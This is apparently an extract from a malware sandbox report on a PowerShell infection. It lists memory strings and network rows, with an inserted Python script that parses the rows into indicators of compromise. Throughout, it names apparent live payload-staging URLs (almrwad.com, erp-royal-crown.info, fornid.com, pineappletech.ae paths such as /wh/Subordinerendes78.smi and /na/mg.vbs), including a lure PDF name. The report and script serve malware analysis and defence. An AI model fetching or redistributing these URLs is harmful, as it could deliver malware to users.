Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:41:21 GMT | server: LiteSpeed
Source: powershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://almrwad.com
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://blog.fornid.com/
Source: powershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://erp-royal-crown.info
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fornid.com
Source: powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.almrwad.com
Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.erp-royal-crown.info
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/content/13-international-shipments
Source: powershell.exe, 00000001.00000002.1582421341.000002CDC2B50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC968000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.pineappletech.ae
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Istok
Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAB622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.c
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.co
Source: powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/w
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/S
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Su
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sub
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subo
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subor
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subord
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordi
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordin
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordine
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordiner
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinere
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordineren
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerend
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerende
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes7
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.s
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.sm
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.i
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.in
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.inf
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/w
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/S
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Su
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sub
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subo
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subor
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subord
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordi
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordin
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordine
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordiner
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinere
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordineren
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerend
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerende
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes7
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.s
Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.sm
Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133536C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
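The network rows above carry the report's indicators, but in a form that is awkward to triage by eye: the same payload path is requested over and over from two alternating hosts, most requests carry no User-Agent header (the "HTTP GET or POST without a user agent" signature), and the C2 URL is dumped from PowerShell memory once per character as the script built it up. The following script is an added example for this page, not Joe Sandbox code: it parses such rows into Source, signature and detail cells, extracts domains, requested paths, IP, ASN and JA3, counts per-host retries, lists the UA-less requests, and collapses the character-by-character URL fragments to their longest form. The sample rows are copied from this report in the flattened form the extraction produced (cells run together); the parser also accepts rows with " | " between the cells.

```python
"""Turn the flattened 'Networking' rows of a Joe Sandbox report into IOCs.

Added example for this report page, not Joe Sandbox code. It assumes the row
layout 'Source: <source><signature name>: <detail>' with cells run together
or separated by ' | '. SAMPLE_ROWS are copied from the report above.
"""
import re
from collections import Counter

SAMPLE_ROWS = [  # copied from this report (flattened extraction form)
    "Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive",
    "Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233",
    "Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT",
    "Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e",
    "Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1",
    "Source: global trafficDNS traffic detected: DNS query: www.fornid.com",
    "Source: global trafficDNS traffic detected: DNS query: www.almrwad.com",
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1",
    "Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.",
    "Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c",
    "Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/",
    "Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi",
]

# Signature names this report uses; the source cell is whatever precedes one of them.
SIGNATURES = ("HTTP traffic detected", "DNS traffic detected",
              "UDP traffic detected without corresponding DNS query", "IP Address",
              "ASN Name", "JA3 fingerprint", "String found in binary or memory")
ROW_RE = re.compile(r"^Source:\s*(?P<source>.*?)\s*\|?\s*(?P<sig>"
                    + "|".join(re.escape(s) for s in SIGNATURES) + r"):\s*(?P<detail>.*)$")
REQ_RE = re.compile(r"^(?P<method>GET|POST)\s+(?P<path>\S+)\s+HTTP/1\.[01]")
RESP_RE = re.compile(r"^HTTP/1\.[01]\s+(?P<status>\d{3})")
# Host value may be glued to the next header ("www.almrwad.comConnection:"), so stop lazily.
HOST_RE = re.compile(r"Host:\s*(?P<host>[\w.-]+?)(?=Connection:|\s|\||$)")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
DNS_RE = re.compile(r"DNS query:\s*(?P<name>[\w.-]+)")


def parse_rows(rows):
    """Split each row into its Source, signature-name and detail cells."""
    return [m.groupdict() for m in (ROW_RE.match(r.strip()) for r in rows) if m]


def http_requests(parsed):
    """Request rows only; response rows ('HTTP/1.1 404 ...') fail REQ_RE and are skipped."""
    out = []
    for r in parsed:
        if r["sig"] != "HTTP traffic detected":
            continue
        req, host = REQ_RE.match(r["detail"]), HOST_RE.search(r["detail"])
        if req and host:
            out.append({"method": req["method"], "path": req["path"], "host": host["host"],
                        "has_user_agent": "User-Agent:" in r["detail"]})
    return out


def requests_without_user_agent(parsed):
    """(host, path) of requests sent with no User-Agent header at all."""
    return [(q["host"], q["path"]) for q in http_requests(parsed) if not q["has_user_agent"]]


def host_rotation(parsed):
    """Requests per (path, host): one path fetched alternately from two hosts is the retry loop."""
    return Counter((q["path"], q["host"]) for q in http_requests(parsed))


def response_status_counts(parsed):
    """Status codes of the response rows (every payload fetch in this report got a 404)."""
    return Counter(int(m["status"]) for r in parsed if r["sig"] == "HTTP traffic detected"
                   for m in [RESP_RE.match(r["detail"])] if m)


def collapse_prefixes(strings):
    """Drop every string that is a proper prefix of another one, keeping the longest forms.
    The memory dump lists the URL once per character as it was concatenated; only the full
    URL is worth keeping. Caveat: a genuinely shorter URL (e.g. the bare site root) that
    happens to be a prefix of a longer one is dropped as well."""
    kept = []
    for s in sorted(set(strings), key=len, reverse=True):
        if not any(k.startswith(s) for k in kept):
            kept.append(s)
    return set(kept)


def extract_iocs(parsed):
    """Domains, requested host+path, memory-string URLs, IPs, ASN and JA3 from parsed rows."""
    iocs = {"domains": set(), "requested": set(), "memory_urls": set(),
            "ips": set(), "asn": set(), "ja3": set()}
    for r in parsed:
        sig, detail = r["sig"], r["detail"]
        if sig == "DNS traffic detected" and DNS_RE.search(detail):
            iocs["domains"].add(DNS_RE.search(detail)["name"])
        elif sig == "IP Address":
            iocs["ips"].update(IP_RE.findall(detail))
        elif sig in ("ASN Name", "JA3 fingerprint"):
            iocs["asn" if sig == "ASN Name" else "ja3"].add(detail.split()[0])
        elif sig == "String found in binary or memory" and detail.startswith("http"):
            iocs["memory_urls"].add(detail.strip())
    # The UDP rows to 1.1.1.1 are resolver traffic, not an indicator, and are ignored.
    for q in http_requests(parsed):
        iocs["domains"].add(q["host"])
        iocs["requested"].add(q["host"] + q["path"])
    iocs["memory_urls"] = collapse_prefixes(iocs["memory_urls"])
    return iocs


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for key, vals in extract_iocs(rows).items():
        print(key, sorted(vals))
    print("no User-Agent:", requests_without_user_agent(rows))
    print("host rotation:", host_rotation(rows))
```

On the sample rows the script reports four domains, the four distinct host+path downloads, a single IP, ASN and JA3, the almrwad path requested three times against one against erp-royal-crown, five UA-less requests, and a single memory URL after the fragments are collapsed. Feeding it the whole row list of this report gives the same picture with the full retry counts; note that `collapse_prefixes` will also fold `http://www.fornid.com` into the longer fornid URLs, which is acceptable for blocking but loses nothing only because every shorter form here is a prefix of a longer one.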
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf
